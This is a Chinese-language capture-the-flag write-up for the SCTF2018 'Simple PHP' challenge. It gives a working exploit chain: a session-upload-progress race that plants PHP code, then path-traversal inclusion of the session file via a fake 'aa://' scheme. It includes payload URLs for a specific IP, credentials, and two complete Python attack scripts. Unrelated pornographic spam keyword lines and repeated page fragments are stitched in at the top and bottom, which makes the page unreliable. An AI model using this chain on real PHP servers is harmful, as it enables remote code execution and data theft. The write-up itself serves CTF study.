美女操一操网站,亚洲三级久久女优视频,每天日中文字幕

以SCTF2018 BabySyc - Simple PHP為例子

官方正解:
https://www.cnblogs.com/iamstudy/articles/sctf2018_simple_php_web_writeup.html

session upload是非預(yù)期解
關(guān)于session opload給幾個(gè)參考鏈接：
https://xz.aliyun.com/t/2148
http://php.net/manual/zh/session.upload-progress.php
http://skysec.top/2018/04/04/amazing-phpinfo/

image.png

文件包含讀phpinfo

http://116.62.71.206:52872/?f=phpinfo.php

image.png

開(kāi)了 session.upload_progress.enabled = on 說(shuō)明可以覆蓋session
開(kāi)了clean up說(shuō)明需要競(jìng)爭(zhēng)
競(jìng)爭(zhēng)腳本附在最下方

image.png

這里實(shí)際上包含的session內(nèi)容是：

admin|i:1;upload_progress_<?php echo file_get_contents("/tmp/flag_56CcE97QGNxDEXNpW3HY");?>|a:5:{s:10:"start_time";i:1529519759;s:14:"content_length";i:90736;s:15:"bytes_processed";i:5291;s:4:"done";b:0;s:5:"files";a:1:{i:0;a:7:{s:10:"field_name";s:6:"upload";s:4:"name";s:7:"tmp.jpg";s:8:"tmp_name";N;s:5:"error";i:0;s:4:"done";b:0;s:10:"start_time";i:1529519759;s:15:"bytes_processed";i:0;}}}

踩過(guò)的坑點(diǎn)

該題目調(diào)用了so來(lái)實(shí)現(xiàn)php的加解密，這里的文件包含調(diào)用了加密的index.php，所以要include也是include加密的php代碼，但是這里的session只能控制<?php echo file_get_contents("/tmp/flag_56CcE97QGNxDEXNpW3HY");?>，最多也只是將session中的該片段進(jìn)行加密，session其余的內(nèi)容未加密也會(huì)導(dǎo)致解密出錯(cuò)

幸虧這題目為了讓選手能調(diào)用php偽協(xié)議，留了個(gè)直接php解析，不需要加密的"后門(mén)"，只判斷了://

image.png

所以可以用payload繞過(guò)加解密步驟，來(lái)include session并直接調(diào)用php解析

http://116.62.71.206:52872/?f=aa://../../../../var/lib/php/sessions/sess_qc2kavokdjiiepu283hduivod2

image.png

SessionUpload.py

#!coding:utf-8
import requests
import time

url = 'http://116.62.71.206:52872/?f=login.php'
data = {'name':'admin','pass':'sctf2018_h656cDBkU2'}

r = requests.post(url,data = data)
PHPSESSID = r.cookies['PHPSESSID']
print 'input the PHPSESSID in include.py' +'\n' + PHPSESSID
time.sleep(10)

while 1:
    url = 'http://116.62.71.206:52872/?f=upload_sctf2018_C9f7y48M75.php'
    files = { 
    "PHP_SESSION_UPLOAD_PROGRESS" : (None,'<?php echo file_get_contents("/tmp/flag_56CcE97QGNxDEXNpW3HY");?>'),  
    
    "upload" : ("tmp.jpg", open("tmp.png", "rb"), "image/png"), 

    "submit" : (None,"submit")
    }  
    #proxies = {'http':'http://127.0.0.1:8080'}
    headers = {'Cookie':'PHPSESSID=' + PHPSESSID}
    r = requests.post(url,files = files , headers = headers)
    print r.text
    print PHPSESSID
    #開(kāi)了cleanup，需要競(jìng)爭(zhēng)，并且保持回話(huà)的session

include.py

#!coding:utf-8

import requests
PHPSESSID = 'qc2kavokdjiiepu283hduivod2'
while 1:
    url = 'http://116.62.71.206:52872/?f=aa://../../../../var/lib/php/sessions/sess_' + PHPSESSID
    print url
    r = requests.get(url)
    if 'SCTF' in r.text:
        print r.text
        break

色偷偷精品伊人,欧洲久久精品,欧美综合婷婷骚逼,国产AV主播,国产最新探花在线,九色在线视频一区,伊人大交九欧美,1769亚洲,黄色成人av

session upload get shell

session upload get shell

以SCTF2018 BabySyc - Simple PHP為例子

文件包含讀phpinfo

踩過(guò)的坑點(diǎn)

SessionUpload.py

include.py

相關(guān)閱讀更多精彩內(nèi)容

友情鏈接更多精彩內(nèi)容

色偷偷精品伊人,欧洲久久精品,欧美综合婷婷骚逼,国产AV主播,国产最新探花在线,九色在线视频一区,伊人大交九 欧美,1769亚洲,黄色成人av

session upload get shell

以SCTF2018 BabySyc - Simple PHP為例子

文件包含讀phpinfo

踩過(guò)的坑點(diǎn)

SessionUpload.py

include.py

相關(guān)閱讀更多精彩內(nèi)容

友情鏈接更多精彩內(nèi)容

色偷偷精品伊人,欧洲久久精品,欧美综合婷婷骚逼,国产AV主播,国产最新探花在线,九色在线视频一区,伊人大交九欧美,1769亚洲,黄色成人av